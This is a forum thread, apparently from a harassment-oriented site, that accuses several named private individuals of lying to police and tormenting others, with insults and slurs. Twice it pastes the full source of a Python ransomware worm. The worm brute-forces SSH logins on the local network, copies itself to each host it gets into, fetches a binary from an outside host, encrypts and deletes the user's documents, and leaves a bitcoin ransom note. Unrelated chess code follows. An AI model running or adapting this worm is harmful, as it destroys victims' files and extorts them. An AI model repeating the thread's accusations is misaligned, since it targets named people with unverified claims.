Isabella Loretta Janke and Louis Herz cook up plan to lie to police, FBI & Texas tech U, plans to pin it all on @Firion - a story in pictures - Updated

I'm already convinced Louis Herz wants to be an elite secops gubbamint agent and thinks Bella will get him in with her dad to make that happen if he pwns the haters hard enough for her.
She's convinced Luis she is poor and her dad is nuts.
She's so relatable, you guys!
Screenshot 2021-08-09 at 20.54.54.pngScreenshot 2021-08-09 at 20.54.42.pngScreenshot 2021-08-09 at 20.54.31.png
 
I'm already convinced Louis Herz wants to be an elite secops gubbamint agent and thinks Bella will get him in with her dad to make that happen if he pwns the haters hard enough for her.
Louis is so stupid that he unironically believed that ILJ's father was a homeless guy in Mexico.
 
Last edited:
Both Louis Herz and Owobu Allen Omongidale are actually shook by this, some of their accounts have been deleted/locked since the investigation into Isabella started. Why would these two upstanding gentlemen DFE if they are as disconnected as they claim? How do they explain all the Discord screenshots that clearly implicate them?
:thinking:
 
Wanted to pop in to say that this is some Scooby-Doo villain level of fuckery.

"I would have gotten away with it too, if wasn't for you meddling kiwifarmers!" should be some sort of merch.

Once again, I said it in the main thread. Godspeed for the work of sifting through information.
 
Her turning on Louis, too.
I'm 100% convinced that anyone anonymously trying to take heat off this bitch is Bella herself. It was the first thing she posted in the thread when she started creating socks. Something to the affect of "So this person created a lulzy event around chris, why are we doxing them if they are so based???"
 
I'm curious if there are any callbacks to a VPS or IP in there or if it's just annoying in nature.

Also, distributing malware is a federal crime. Admitting to it just makes her a fucking retar
I attached the sources to the post but I will share them in text, too.

Code:
import paramiko
import tarfile
import sys
import socket
import nmap
import os
import sys
import struct
import fcntl
import netifaces
import urllib
import shutil
from subprocess import call

# The list of credentials to attempt
credList = [
('hello', 'world'),
('hello1', 'world'),
('root', '#Gig#'),
('cpsc', 'cpsc'),
('ubuntu', '123456')
]

# The file marking whether the worm should spread
INFECTED_MARKER_FILE = "/tmp/infected.txt"

##################################################################
# Returns whether the worm should spread
# @return - True if the infection succeeded and false otherwise
##################################################################
def isInfectedSystem(ssh):
    # Check if the system as infected. One
    # approach is to check for a file called
    # infected.txt in directory /tmp (which
    # you created when you marked the system
    # as infected).
    try:
        sftpClient = ssh.open_sftp()
        sftpClient.stat(INFECTED_MARKER_FILE)
        return True
    except:
        return False

#################################################################
# Marks the system as infected
#################################################################
def markInfected():

    # Mark the system as infected. One way to do
    # this is to create a file called infected.txt
    # in directory /tmp/
    file_obj = open(INFECTED_MARKER_FILE, "w")
    file_obj.write("Has anyone really been far as decided to use even go want to do more like?")
    file_obj.close()
###############################################################
# Spread to the other system and execute
# @param sshClient - the instance of the SSH client connected
# to the victim system
###############################################################
def spreadAndExecute(sshClient):
wormLoc = "/tmp/extorter_worm.py"
    if len(sys.argv) >= 2:
        if sys.argv[1] == "--host":
            wormLoc = "extorter_worm.py"
    sftpClient = sshClient.open_sftp()
    sftpClient.put(wormLoc, "/tmp/extorter_worm.py")
    sshClient.exec_command("chmod a+x /tmp/extorter_worm.py")
    sshClient.exec_command("nohup python /tmp/extorter_worm.py &")
def tryCredentials(host, userName, _password, sshClient):
try:
        sshClient.connect(host, username=userName, password=_password)
        return 0
    except paramiko.ssh_exception.AuthenticationException:
        return 1
    except socket.error:
        return 3
def attackSystem(host):

    # The credential list
    global credList

    # Create an instance of the SSH client
    ssh = paramiko.SSHClient()

    # Set some parameters to make things easier.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


    # Go through the credential
    for (username, password) in credList:

        # TODO: here you will need to
        # call the tryCredentials function
        # to try to connect to the
        # remote system using the above
        # credentials.  If tryCredentials
        # returns 0 then we know we have
        # successfully compromised the
        # victim. In this case we will
        # return a tuple containing an
        # instance of the SSH connection
        # to the remote system.
        if tryCredentials(host, username, password, ssh) == 0:
            print "Success with " + host + " " +  username + " " + password
return (ssh, username, password)
        elif tryCredentials(host, username, password, ssh) == 1:
            print "Wrong Credentials on host " + host
            continue
        elif tryCredentials(host, username, password, ssh) == 3:
            print "No SSH client on " + host
            break #no ssh client so just stop
    # Could not find working credentials
    return None

def getMyIP(interface):
    # TODO: Change this to retrieve and
    # return the IP of the current system.
        # Open the socket

        # Get all the network interfaces on the system
        networkInterfaces = netifaces.in  terfaces()

        # The IP address
        ipAddr = None

        # Go through all the interfaces
        for netFace in networkInterfaces:

                # The IP address of the interface
                addr = netifaces.ifaddresses(netFace)[2][0]['addr']

                # Get the IP address
                if not addr == "127.0.0.1":

                        # Save the IP addrss and break
                        ipAddr = addr
                        break

        return ipAddr
def getHostsOnTheSameNetwork():

    # TODO: Add code for scanning
    # for hosts on the same network
    # and return the list of discovered
    # IP addresses.
    portScanner = nmap.PortScanner()
    portScanner.scan('192.168.1.0/24', arguments='-p -22 --open')
    hostInfo = portScanner.all_hosts();
    liveHosts = []
    ip_add = getMyIP(b"eth0")
    for host in hostInfo:
        if portScanner[host].state() == "up" and host != ip_add:
            liveHosts.append(host)

    return liveHosts

def encryptFiles():
    try:
        urllib.urlretrieve("http://ecs.fullerton.edu/~mgofman/openssl", "openssl")
        tar = tarfile.open("Documents.tar", "w:gz")
        tar.add("/home/ubuntu/Documents/")
        tar.close()
        call(["chmod", "a+x", "./openssl"])
        call(["openssl", "aes-256-cbc", "-a", "-salt", "-in", "Documents.tar", "-out", "Documents.tar.enc", "-k", "cs456worm"])
        shutil.rmtree('/home/ubuntu/Documents/')
        file_obj = open("give_me_moneyz.txt", "w")
        file_obj.write("Send 100000 btc to 1xcfuh3298sdfz or never see your files again ")
        file_obj.close()
        os.remove("Documents.tar")
    except:
        print "unable to encrpyt"


# Get the hosts on the same network
networkHosts = getHostsOnTheSameNetwork()
#worm checks if its already exists
if not os.path.exists(INFECTED_MARKER_FILE):
    markInfected()
else:
    print "Already Infected"
    sys.exit()

#if its not host then encrpyt
if len(sys.argv) >= 2:
    print "Host, do not encrpyt"
else:
    encryptFiles()
# Go through the network hosts
for host in networkHosts:

    # Try to attack this host
    sshInfo =  attackSystem(host)

    print sshInfo


    # Did the attack succeed?
    if sshInfo:

        print "Trying to spread"
         if isInfectedSystem(sshInfo[0]) == True:
            print "Remote System is Infected"
            continue
        else:
            spreadAndExecute(sshInfo[0])
            print "Spreading complete on " + host
            sys.exit()

Chess.cpp seems unrelated but I will include it anyway
Code:
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

namespace Chess.Game {
    public class HumanPlayer : Player {

        public enum InputState {
            None,
            PieceSelected,
            DraggingPiece
        }

        InputState currentState;

        BoardUI boardUI;
        Camera cam;
        Coord selectedPieceSquare;
        Board board;
        public HumanPlayer (Board board) {
            boardUI = GameObject.FindObjectOfType<BoardUI> ();
            cam = Camera.main;
            this.board = board;
        }

        public override void NotifyTurnToMove () {

        }

        public override void Update () {
            HandleInput ();
        }

        void HandleInput () {
            Vector2 mousePos = cam.ScreenToWorldPoint (Input.mousePosition);

            if (currentState == InputState.None) {
                HandlePieceSelection (mousePos);
            } else if (currentState == InputState.DraggingPiece) {
                HandleDragMovement (mousePos);
            } else if (currentState == InputState.PieceSelected) {
                HandlePointAndClickMovement (mousePos);
            }

            if (Input.GetMouseButtonDown (1)) {
                CancelPieceSelection ();
            }
        }

        void HandlePointAndClickMovement (Vector2 mousePos) {
            if (Input.GetMouseButton (0)) {
                HandlePiecePlacement (mousePos);
            }
        }

        void HandleDragMovement (Vector2 mousePos) {
            boardUI.DragPiece (selectedPieceSquare, mousePos);
            // If mouse is released, then try place the piece
            if (Input.GetMouseButtonUp (0)) {
                HandlePiecePlacement (mousePos);
            }
        }

        void HandlePiecePlacement (Vector2 mousePos) {
            Coord targetSquare;
            if (boardUI.TryGetSquareUnderMouse (mousePos, out targetSquare)) {
                if (targetSquare.Equals (selectedPieceSquare)) {
                    boardUI.ResetPiecePosition (selectedPieceSquare);
                    if (currentState == InputState.DraggingPiece) {
                        currentState = InputState.PieceSelected;
                    } else {
                        currentState = InputState.None;
                        boardUI.DeselectSquare (selectedPieceSquare);
                    }
                } else {
                    int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare.fileIndex, targetSquare.rankIndex);
                    if (Piece.IsColour (board.Square[targetIndex], board.ColourToMove) && board.Square[targetIndex] != 0) {
                        CancelPieceSelection ();
                        HandlePieceSelection (mousePos);
                    } else {
                        TryMakeMove (selectedPieceSquare, targetSquare);
                    }
                }
            } else {
                CancelPieceSelection ();
            }

        }

        void CancelPieceSelection () {
            if (currentState != InputState.None) {
                currentState = InputState.None;
                boardUI.DeselectSquare (selectedPieceSquare);
                boardUI.ResetPiecePosition (selectedPieceSquare);
            }
        }

        void TryMakeMove (Coord startSquare, Coord targetSquare) {
            int startIndex = BoardRepresentation.IndexFromCoord (startSquare);
            int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare);
            bool moveIsLegal = false;
            Move chosenMove = new Move ();

            MoveGenerator moveGenerator = new MoveGenerator ();
            bool wantsKnightPromotion = Input.GetKey (KeyCode.LeftAlt);

            var legalMoves = moveGenerator.GenerateMoves (board);
            for (int i = 0; i < legalMoves.Count; i++) {
                var legalMove = legalMoves[i];

                if (legalMove.StartSquare == startIndex && legalMove.TargetSquare == targetIndex) {
                    if (legalMove.IsPromotion) {
                        if (legalMove.MoveFlag == Move.Flag.PromoteToQueen && wantsKnightPromotion) {
                            continue;
                        }
                        if (legalMove.MoveFlag != Move.Flag.PromoteToQueen && !wantsKnightPromotion) {
                            continue;
                        }
                    }
                    moveIsLegal = true;
                    chosenMove = legalMove;
                    //    Debug.Log (legalMove.PromotionPieceType);
                    break;
                }
            }

            if (moveIsLegal) {
                ChoseMove (chosenMove);
                currentState = InputState.None;-
            } else {
                CancelPieceSelection ();
            }
        }

        void HandlePieceSelection (Vector2 mousePos) {
            if (Input.GetMouseButtonDown (0)) {
                if (boardUI.TryGetSquareUnderMouse (mousePos, out selectedPieceSquare)) {
                    int index = BoardRepresentation.IndexFromCoord (selectedPieceSquare);
                    // If square contains a piece, select that piece for dragging
                    if (Piece.IsColour (board.Square[index], board.ColourToMove)) {
                        boardUI.HighlightLegalMoves (board, selectedPieceSquare);
                        boardUI.SelectSquare (selectedPieceSquare);
                        currentState = InputState.DraggingPiece;
                    }
                }
            }
        }
    }
}

She does do some of it for class I think but admitting to actually spreading it sure is retarded yes
 
I attached the sources to the post but I will share them in text, too.

Code:
import paramiko
import tarfile
import sys
import socket
import nmap
import os
import sys
import struct
import fcntl
import netifaces
import urllib
import shutil
from subprocess import call

# The list of credentials to attempt
credList = [
('hello', 'world'),
('hello1', 'world'),
('root', '#Gig#'),
('cpsc', 'cpsc'),
('ubuntu', '123456')
]

# The file marking whether the worm should spread
INFECTED_MARKER_FILE = "/tmp/infected.txt"

##################################################################
# Returns whether the worm should spread
# @return - True if the infection succeeded and false otherwise
##################################################################
def isInfectedSystem(ssh):
    # Check if the system as infected. One
    # approach is to check for a file called
    # infected.txt in directory /tmp (which
    # you created when you marked the system
    # as infected).
    try:
        sftpClient = ssh.open_sftp()
        sftpClient.stat(INFECTED_MARKER_FILE)
        return True
    except:
        return False

#################################################################
# Marks the system as infected
#################################################################
def markInfected():

    # Mark the system as infected. One way to do
    # this is to create a file called infected.txt
    # in directory /tmp/
    file_obj = open(INFECTED_MARKER_FILE, "w")
    file_obj.write("Has anyone really been far as decided to use even go want to do more like?")
    file_obj.close()
###############################################################
# Spread to the other system and execute
# @param sshClient - the instance of the SSH client connected
# to the victim system
###############################################################
def spreadAndExecute(sshClient):
wormLoc = "/tmp/extorter_worm.py"
    if len(sys.argv) >= 2:
        if sys.argv[1] == "--host":
            wormLoc = "extorter_worm.py"
    sftpClient = sshClient.open_sftp()
    sftpClient.put(wormLoc, "/tmp/extorter_worm.py")
    sshClient.exec_command("chmod a+x /tmp/extorter_worm.py")
    sshClient.exec_command("nohup python /tmp/extorter_worm.py &")
def tryCredentials(host, userName, _password, sshClient):
try:
        sshClient.connect(host, username=userName, password=_password)
        return 0
    except paramiko.ssh_exception.AuthenticationException:
        return 1
    except socket.error:
        return 3
def attackSystem(host):

    # The credential list
    global credList

    # Create an instance of the SSH client
    ssh = paramiko.SSHClient()

    # Set some parameters to make things easier.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


    # Go through the credential
    for (username, password) in credList:

        # TODO: here you will need to
        # call the tryCredentials function
        # to try to connect to the
        # remote system using the above
        # credentials.  If tryCredentials
        # returns 0 then we know we have
        # successfully compromised the
        # victim. In this case we will
        # return a tuple containing an
        # instance of the SSH connection
        # to the remote system.
        if tryCredentials(host, username, password, ssh) == 0:
            print "Success with " + host + " " +  username + " " + password
return (ssh, username, password)
        elif tryCredentials(host, username, password, ssh) == 1:
            print "Wrong Credentials on host " + host
            continue
        elif tryCredentials(host, username, password, ssh) == 3:
            print "No SSH client on " + host
            break #no ssh client so just stop
    # Could not find working credentials
    return None

def getMyIP(interface):
    # TODO: Change this to retrieve and
    # return the IP of the current system.
        # Open the socket

        # Get all the network interfaces on the system
        networkInterfaces = netifaces.in  terfaces()

        # The IP address
        ipAddr = None

        # Go through all the interfaces
        for netFace in networkInterfaces:

                # The IP address of the interface
                addr = netifaces.ifaddresses(netFace)[2][0]['addr']

                # Get the IP address
                if not addr == "127.0.0.1":

                        # Save the IP addrss and break
                        ipAddr = addr
                        break

        return ipAddr
def getHostsOnTheSameNetwork():

    # TODO: Add code for scanning
    # for hosts on the same network
    # and return the list of discovered
    # IP addresses.
    portScanner = nmap.PortScanner()
    portScanner.scan('192.168.1.0/24', arguments='-p -22 --open')
    hostInfo = portScanner.all_hosts();
    liveHosts = []
    ip_add = getMyIP(b"eth0")
    for host in hostInfo:
        if portScanner[host].state() == "up" and host != ip_add:
            liveHosts.append(host)

    return liveHosts

def encryptFiles():
    try:
        urllib.urlretrieve("http://ecs.fullerton.edu/~mgofman/openssl", "openssl")
        tar = tarfile.open("Documents.tar", "w:gz")
        tar.add("/home/ubuntu/Documents/")
        tar.close()
        call(["chmod", "a+x", "./openssl"])
        call(["openssl", "aes-256-cbc", "-a", "-salt", "-in", "Documents.tar", "-out", "Documents.tar.enc", "-k", "cs456worm"])
        shutil.rmtree('/home/ubuntu/Documents/')
        file_obj = open("give_me_moneyz.txt", "w")
        file_obj.write("Send 100000 btc to 1xcfuh3298sdfz or never see your files again ")
        file_obj.close()
        os.remove("Documents.tar")
    except:
        print "unable to encrpyt"


# Get the hosts on the same network
networkHosts = getHostsOnTheSameNetwork()
#worm checks if its already exists
if not os.path.exists(INFECTED_MARKER_FILE):
    markInfected()
else:
    print "Already Infected"
    sys.exit()

#if its not host then encrpyt
if len(sys.argv) >= 2:
    print "Host, do not encrpyt"
else:
    encryptFiles()
# Go through the network hosts
for host in networkHosts:

    # Try to attack this host
    sshInfo =  attackSystem(host)

    print sshInfo


    # Did the attack succeed?
    if sshInfo:

        print "Trying to spread"
         if isInfectedSystem(sshInfo[0]) == True:
            print "Remote System is Infected"
            continue
        else:
            spreadAndExecute(sshInfo[0])
            print "Spreading complete on " + host
            sys.exit()

Chess.cpp seems unrelated but I will include it anyway
Code:
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

namespace Chess.Game {
    public class HumanPlayer : Player {

        public enum InputState {
            None,
            PieceSelected,
            DraggingPiece
        }

        InputState currentState;

        BoardUI boardUI;
        Camera cam;
        Coord selectedPieceSquare;
        Board board;
        public HumanPlayer (Board board) {
            boardUI = GameObject.FindObjectOfType<BoardUI> ();
            cam = Camera.main;
            this.board = board;
        }

        public override void NotifyTurnToMove () {

        }

        public override void Update () {
            HandleInput ();
        }

        void HandleInput () {
            Vector2 mousePos = cam.ScreenToWorldPoint (Input.mousePosition);

            if (currentState == InputState.None) {
                HandlePieceSelection (mousePos);
            } else if (currentState == InputState.DraggingPiece) {
                HandleDragMovement (mousePos);
            } else if (currentState == InputState.PieceSelected) {
                HandlePointAndClickMovement (mousePos);
            }

            if (Input.GetMouseButtonDown (1)) {
                CancelPieceSelection ();
            }
        }

        void HandlePointAndClickMovement (Vector2 mousePos) {
            if (Input.GetMouseButton (0)) {
                HandlePiecePlacement (mousePos);
            }
        }

        void HandleDragMovement (Vector2 mousePos) {
            boardUI.DragPiece (selectedPieceSquare, mousePos);
            // If mouse is released, then try place the piece
            if (Input.GetMouseButtonUp (0)) {
                HandlePiecePlacement (mousePos);
            }
        }

        void HandlePiecePlacement (Vector2 mousePos) {
            Coord targetSquare;
            if (boardUI.TryGetSquareUnderMouse (mousePos, out targetSquare)) {
                if (targetSquare.Equals (selectedPieceSquare)) {
                    boardUI.ResetPiecePosition (selectedPieceSquare);
                    if (currentState == InputState.DraggingPiece) {
                        currentState = InputState.PieceSelected;
                    } else {
                        currentState = InputState.None;
                        boardUI.DeselectSquare (selectedPieceSquare);
                    }
                } else {
                    int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare.fileIndex, targetSquare.rankIndex);
                    if (Piece.IsColour (board.Square[targetIndex], board.ColourToMove) && board.Square[targetIndex] != 0) {
                        CancelPieceSelection ();
                        HandlePieceSelection (mousePos);
                    } else {
                        TryMakeMove (selectedPieceSquare, targetSquare);
                    }
                }
            } else {
                CancelPieceSelection ();
            }

        }

        void CancelPieceSelection () {
            if (currentState != InputState.None) {
                currentState = InputState.None;
                boardUI.DeselectSquare (selectedPieceSquare);
                boardUI.ResetPiecePosition (selectedPieceSquare);
            }
        }

        void TryMakeMove (Coord startSquare, Coord targetSquare) {
            int startIndex = BoardRepresentation.IndexFromCoord (startSquare);
            int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare);
            bool moveIsLegal = false;
            Move chosenMove = new Move ();

            MoveGenerator moveGenerator = new MoveGenerator ();
            bool wantsKnightPromotion = Input.GetKey (KeyCode.LeftAlt);

            var legalMoves = moveGenerator.GenerateMoves (board);
            for (int i = 0; i < legalMoves.Count; i++) {
                var legalMove = legalMoves[i];

                if (legalMove.StartSquare == startIndex && legalMove.TargetSquare == targetIndex) {
                    if (legalMove.IsPromotion) {
                        if (legalMove.MoveFlag == Move.Flag.PromoteToQueen && wantsKnightPromotion) {
                            continue;
                        }
                        if (legalMove.MoveFlag != Move.Flag.PromoteToQueen && !wantsKnightPromotion) {
                            continue;
                        }
                    }
                    moveIsLegal = true;
                    chosenMove = legalMove;
                    //    Debug.Log (legalMove.PromotionPieceType);
                    break;
                }
            }

            if (moveIsLegal) {
                ChoseMove (chosenMove);
                currentState = InputState.None;-
            } else {
                CancelPieceSelection ();
            }
        }

        void HandlePieceSelection (Vector2 mousePos) {
            if (Input.GetMouseButtonDown (0)) {
                if (boardUI.TryGetSquareUnderMouse (mousePos, out selectedPieceSquare)) {
                    int index = BoardRepresentation.IndexFromCoord (selectedPieceSquare);
                    // If square contains a piece, select that piece for dragging
                    if (Piece.IsColour (board.Square[index], board.ColourToMove)) {
                        boardUI.HighlightLegalMoves (board, selectedPieceSquare);
                        boardUI.SelectSquare (selectedPieceSquare);
                        currentState = InputState.DraggingPiece;
                    }
                }
            }
        }
    }
}

She does do some of it for class I think but admitting to actually spreading it sure is retarded yes


Not a programmer by any means, and I'm just glancing through before I step out for a bit. But I see this line " file_obj.write("Send 100000 btc to 1xcfuh3298sdfz or never see your files again"

I'm curious if that's some BTC address, but I thought they were longer?

Looks like there's a script to download a VPN cert (HTTP[:]//ecs.fullerton[.]edu/~mgofman/openssl).

Also, googling extorter_worm.py shows a github link where it was originally a school assignment. (https://github.com/vandanpatelgithub/CS456-Worms-Python/blob/master/extorter_worm.py) is one example, probably more.


Very well could be just a class project she tweaked or wanted to brag to her friends, hell if I know.
 
Back